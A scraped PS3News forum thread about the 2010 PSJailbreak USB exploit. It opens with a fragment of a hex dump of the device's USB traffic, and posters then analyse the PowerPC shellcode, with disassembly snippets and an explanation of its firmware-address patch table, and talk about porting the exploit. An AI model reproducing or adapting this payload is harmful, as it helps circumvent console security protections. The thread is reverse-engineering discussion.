007C0: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
007D0: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
007E0: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
007F0: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00800: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00810: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00820: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00830: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00840: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00850: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00860: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00870: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00880: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00890: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
008A0: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
008B0: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
008C0: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
008D0: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
008E0: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
008F0: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00900: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00910: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00920: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00930: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00940: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00950: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00960: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00970: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00980: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00990: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
009A0: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
009B0: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
009C0: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
009D0: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
009E0: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
009F0: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00A00: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00A10: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00A20: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00A30: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00A40: 00 FE 01 02 00 09 04 00 00 00 FE 01 02

That's all, folks.

Repost in binary (Thanks Disane) The first 8 bytes are from the usb protocol left [09 02 ... ]

http://www.ps3news.com/forums/attachment.php?attachmentid=21111

ASCII binary (Thanks xCoder)

http://www.ps3news.com/forums/attachment.php?attachmentid=21116

Here's an improved disassembly by crazyc.

http://www.ps3news.com/forums/attachment.php?attachmentid=2111

Stay tuned for more PS3 Hacks and PS3 CFW news, follow us on Twitter and be sure to drop by the PS3 Hacks and PS3 Custom Firmware Forums for the latest PlayStation 3 scene updates and homebrew releases!

113 Comments - Go to Forum Thread »

#113 - Karl69 - 142w ago

Originally Posted by tragedy

The shellcode actually looks quite well written (although shows hallmarks of being partially produced with a compiler). I've basically got a good handle now on how it all works

Nice work... Maybe this will help adapting the exploit to older firmwares.

Have you been able to find the parts in the shellcode which would be version dependent?

Karl

#112 - tragedy - 142w ago

Originally Posted by DarkNeo

For example I'm having a hard time figuring out what the oris opcode would do to 64bit registers, does it still take a 16bit immediate value in 64bit chips? And if so which 16 bits in the 64bit register does it OR the immediate value with?

It sets bits 32-47 (note on ppc bits are numbered MSB 0, LSB 63). I'll explain the most common idiom used in the shellcode:

li %r31, 1
rldicr %r31, %r31, 63,0 #r31 = 0x8000 0000 0000 0000
mr %r3, %r31
oris %r3, %r3, 5 # r3 = 0x8000 0000 0005 0000
ori %r3, %r3, 0xB3C # r3 = 0x8000 0000 0005 0b3c
mr %r4, %r31
oris %r4, %r4, 0x70 # r4 = 0x8000 0000 0070 0000
ori %r4, %r4, 0x1AC # r4 = 0x8000 0000 0070 01ac

The shellcode actually looks quite well written (although shows hallmarks of being partially produced with a compiler). I've basically got a good handle now on how it all works, although I've not got an lv2 dump so some of it's guesswork. e.g. at offset 0xc4, there's a call to 0x800000000007c01c which I think is memcpy, but I'm just assuming that for now.

For disassembly tips, 0x12-0x80 is PIC code, entry r3=start of file+0x1000.
0x80-0x1ac add offset 0x8000000000700000 to start of file
0x1ac-0x6f0 add offset 0x8000000000050990 to start of file.

If you can get your head around the various relocations the code undergoes, it's fairly easy code to follow.

Originally Posted by Karl69

If you look through the exploit in the first packet, there is relative coding like this here:

3ac: fb 81 00 80 std r28,128(r1)
3b0: fb a1 00 88 std r29,136(r1)
3b4: fb e1 00 98 std r31,152(r1)
3b8: fb 41 00 70 std r26,112(r1)
3bc: fb 61 00 78 std r27,120(r1)

This is a standard prologue for a stack frame - it's saving registers on the stack.

But then there is also "absolute" coding like this:

150: 00 04 90 e0 .long 0x490e0
154: e8 82 0f 08 ld r4,3848(r2)
158: 00 04 90 e4 .long 0x490e4
15c: e8 7c 00 20 ld r3,32(r28)
160: 00 04 90 e8 .long 0x490e8
164: f8 64 00 00 std r3,0(r4)
168: 00 04 f0 a8 .long 0x4f0a8

The values after .long are probably addresses which are firmware dependent and would have to be changed depending on the FW version. Again I am guessing here...

Spot on. This table (terminated by .long 0) is a table of addresses to which 0x8000000000000000 is added and then patched by the next 4 bytes (helpfully easily disassembled). You'll see the 3 instructions that get written here are sequential.

#111 - DanielSV - 142w ago

What most people here want is the code contained it the Atmel-chip onboard the jailbreak, but that's not easy to get.

What we could do, is to connect the serial port on the pc to the usb port on the ps3, somehow, then send the data. Of course that would only work if the data is static, or if we knew the algorithm for generating a response. I haven't read much of this thread, so I don't know, but I bet a lot of people here do.

#110 - is0mick - 142w ago

Originally Posted by proskopina

this is the usb traffic between the psjailbreak device and ps3.
it contains the exploit code but it doesn't contain the binaries on the psjailbreak itself. i.e it won't let you clone the jailbreak but it will give the devs a great heads up on how to use the exploit and deliver it to the ps3 in different ways.

It could be possible to code a driver for the pc which when the jailbreak is plugged in, would give the response the same as the ps3 does.

I would then think the device would then show up as a flash memory device, and you should be able to copy any contained files from that.

Mick

#109 - proskopina - 142w ago

this is the usb traffic between the psjailbreak device and ps3. it contains the exploit code but it doesn't contain the binaries on the psjailbreak itself. i.e it won't let you clone the jailbreak but it will give the devs a great heads up on how to use the exploit and deliver it to the ps3 in different ways.

Page 1 of 23 12 3 4 5 6 7 8 9 ›LAST »

Related PS3 News and PS3 CFW Hacks or JailBreak Articles

• PSPMinis / PS3Minis / Bite v1.5.1 Update for PS3 is Now Released
• PS3 Fan Control Utility v1.7 for PS3 CFW CEX 3.41 to 4.41 Arrives
• PSPMinis / PS3Minis / Bite v1.5 for PS3 with PSP Homebrew Support
• PS3 Fan Control Utility v1.6 for PS3 CFW CEX 3.41 to 4.40 Arrives
• OpenSCETool (OSCETool) v0.9.2 By SpacemanSpiff for PS3 is Released
• PUAD GUI v1.5 - PS3 PUP Unpacker, Repacker and Decrypter Out

PlayStation 3 Links
• Contact Us E-Mail
• PS3 Affiliates
• PS3 CFW & MFW
• PS3 Debug Firmware
• PS3 Decrypted PSN Links for CFW
• PS3 Downloads
• PS3 EBOOT.BIN Original File Links
• PS3 Firmware
• PS3 Game Releases List
• PS3 Guides & Tutorials
• PS3 Hacking Guides and Tutorials
• PS3 Hacks & JailBreak
• PS3 Help & Support
• PS3 JailBreak Game Compatibility List
• PS3 JB2 / True Blue (TB) Game Links
• PS3 multiMAN Updates
• PS3 News Forums
• PS3 News Site FAQ
• PS3 News Site Advertising FAQ
• PS3 News Site Posting FAQ
• PS3 News Site Privacy FAQ
• PS3 News Site Rules
• PS3 News Site Tag Cloud
• PS3 News Site Terms
• PS3 Resources
• PS3 Reviews
• PS3 Save Files Repository
• PS3 Themes
• PS3 Trophies List
• PS3 Videos
• PS Vita Trophies List

PlayStation 3 News Discussions

a little help recqired plzzz - 1h ago

i am on 3.55 cfw and want to go to 4.4cfw , if i do so will my backed up games on my ps3's hard dive will be lost/deleted or will it be retained ? plz...

By mughal1990 with

0 Comments »

PS3 Fan Control Utility v0.3 for 4.31 and 4.40 CFW CEX is Released - 2h ago

There's no such thing as DREX firmware, D-REX is REX but installable on DEX firmware. Once you install D-REX, you end up on REX. So this sentence s...

By mschumacher69 with

18 Comments »

Introductions: Hello Everyone, I'm New at PS3News.com! - 3h ago